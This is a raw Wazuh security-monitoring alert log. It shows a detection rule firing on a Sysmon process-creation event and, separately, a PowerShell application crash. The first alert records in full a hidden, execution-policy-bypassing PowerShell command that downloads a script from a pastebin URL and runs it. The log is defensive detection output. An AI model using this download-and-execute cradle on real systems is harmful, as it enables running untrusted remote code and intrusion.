tail -f /var/ossec/logs/alerts/alerts.json | grep miki
{"timestamp":"2019-09-19T22:13:06.241+0300","rule":{"level":12,"description":"PowerShell scripts that download content from the Internet: \"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe\" -w hidden -ep bypass -nop -c “IEX ((New-Object System.Net.Webclient).DownloadString(‘
http://pastebin.com/raw/[REMOVED]’))”","id":"255011","firedtimes":1,"mail":true,"groups":["sysmon"]},"agent":{"id":"044","name":"miki_Miki","ip":"10.0.0.9"},"manager":{"name":"wazuh"},"id":"1568920386.45711818","full_log":"{\"win\":{\"system\":{\"providerName\":\"Microsoft-Windows-Sysmon\",\"providerGuid\":\"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}\",\"eventID\":\"1\",\"version\":\"5\",\"level\":\"4\",\"task\":\"1\",\"opcode\":\"0\",\"keywords\":\"0x8000000000000000\",\"systemTime\":\"2019-09-19T19:13:02.724049800Z\",\"eventRecordID\":\"1653596\",\"processID\":\"6772\",\"threadID\":\"4732\",\"channel\":\"Microsoft-Windows-Sysmon/Operational\",\"computer\":\"DESKTOP-DCNJEUR\",\"severityValue\":\"INFORMATION\",\"message\":\"Process Create:\"},\"eventdata\":{\"utcTime\":\"2019-09-19 19:13:02.715\",\"processGuid\":\"{EFEF7267-D33E-5D83-0000-00108B3F3426}\",\"processId\":\"27740\",\"image\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"fileVersion\":\"10.0.17134.1 (WinBuild.160101.0800)\",\"description\":\"Windows PowerShell\",\"product\":\"Microsoft® Windows® Operating System\",\"company\":\"Microsoft Corporation\",\"originalFileName\":\"PowerShell.EXE\",\"commandLine\":\"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell.exe\\\" -w hidden -ep bypass -nop -c “IEX ((New-Object System.Net.Webclient).DownloadString(‘
http://pastebin.com/raw/[REMOVED]’))”\",\"currentDirectory\":\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\\",\"user\":\"DESKTOP-DCNJEUR\\\\miki\",\"logonGuid\":\"{EFEF7267-F0B8-5D70-0000-0020EE380300}\",\"logonId\":\"0x338ee\",\"terminalSessionId\":\"1\",\"integrityLevel\":\"Medium\",\"hashes\":\"MD5=95000560239032BC68B4C2FDFCDEF913,SHA256=D3F8FADE829D2B7BD596C4504A6DAE5C034E789B6A3DEFBE013BDA7D14466677\",\"parentProcessGuid\":\"{EFEF7267-F0B9-5D70-0000-00105F4A0500}\",\"parentProcessId\":\"5196\",\"parentImage\":\"C:\\\\Windows\\\\explorer.exe\",\"parentCommandLine\":\"C:\\\\Windows\\\\Explorer.EXE\"}}}","decoder":{"name":"windows_eventchannel"},"data":{"win":{"system":{"providerName":"Microsoft-Windows-Sysmon","providerGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","eventID":"1","version":"5","level":"4","task":"1","opcode":"0","keywords":"0x8000000000000000","systemTime":"2019-09-19T19:13:02.724049800Z","eventRecordID":"1653596","processID":"6772","threadID":"4732","channel":"Microsoft-Windows-Sysmon/Operational","computer":"DESKTOP-DCNJEUR","severityValue":"INFORMATION","message":"Process Create:"},"eventdata":{"utcTime":"2019-09-19 19:13:02.715","processGuid":"{EFEF7267-D33E-5D83-0000-00108B3F3426}","processId":"27740","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","fileVersion":"10.0.17134.1 (WinBuild.160101.0800)","description":"Windows PowerShell","product":"Microsoft® Windows® Operating System","company":"Microsoft Corporation","originalFileName":"PowerShell.EXE","commandLine":"\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe\" -w hidden -ep bypass -nop -c “IEX ((New-Object System.Net.Webclient).DownloadString(‘
http://pastebin.com/raw/[REMOVED]’))”","currentDirectory":"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\","user":"DESKTOP-DCNJEUR\\miki","logonGuid":"{EFEF7267-F0B8-5D70-0000-0020EE380300}","logonId":"0x338ee","terminalSessionId":"1","integrityLevel":"Medium","hashes":"MD5=95000560239032BC68B4C2FDFCDEF913,SHA256=D3F8FADE829D2B7BD596C4504A6DAE5C034E789B6A3DEFBE013BDA7D14466677","parentProcessGuid":"{EFEF7267-F0B9-5D70-0000-00105F4A0500}","parentProcessId":"5196","parentImage":"C:\\Windows\\explorer.exe","parentCommandLine":"C:\\Windows\\Explorer.EXE"}}},"location":"EventChannel"}
{"timestamp":"2019-09-19T22:13:09.224+0300","rule":{"level":5,"description":"Windows error event.","id":"18103","firedtimes":7,"mail":false,"groups":["windows","system_error"],"gpg13":["4.3"],"gdpr":["IV_35.7.d"]},"agent":{"id":"044","name":"miki_Miki","ip":"10.0.0.9"},"manager":{"name":"wazuh"},"id":"1568920389.45715698","full_log":"2019 Sep 19 22:13:03 WinEvtLog: Application: ERROR(1000): Application Error: (no user): no domain: DESKTOP-DCNJEUR: Faulting application name: PowerShell.exe, version: 10.0.17134.1, time stamp: 0x05e7290f Faulting module name: bcryptPrimitives.dll, version: 10.0.17134.950, time stamp: 0xb13b6b13 Exception code: 0xc0000005 Fault offset: 0x000000000000d2b5 Faulting process id: 0x6c5c Faulting application start time: 0x01d56f1e422b9c3b Faulting application path: C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe Faulting module path: C:\\Windows\\System32\\bcryptPrimitives.dll Report Id: 7aed6d89-80e8-431d-a540-6a68a5debf81 Faulting package full name: ? Faulting package-relative application ID: ? ","predecoder":{"program_name":"WinEvtLog","timestamp":"2019 Sep 19 22:13:03"},"decoder":{"parent":"windows","name":"windows"},"data":{"dstuser":"(no user)","id":"1000","status":"ERROR","data":"Application Error","system_name":"DESKTOP-DCNJEUR","type":"Application"},"location":"WinEvtLog"}